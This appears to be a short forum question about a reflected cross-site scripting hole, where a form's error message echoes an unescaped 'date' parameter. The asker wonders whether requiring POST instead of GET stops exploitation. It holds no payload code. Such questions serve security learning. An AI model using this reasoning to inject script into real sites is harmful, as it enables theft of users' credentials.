Consider the following URL http://mysite.com/form?date=x
. Suppose that if x
is in an incorrect format, that a page is returned with <p>x is not a valid date</p>
, where the page author has forgotten to escape the variable x
. Assume that x
is properly escaped in all other locations.
It is possible to create a malicious link that could insert arbitrary Javascript with access to the user's credentials. What if the site required a POST rather than a GET? Would there a way to exploit this security hole?
UPDATE: Changed the situation to be more realistic and removed irrelevant references to clickjacking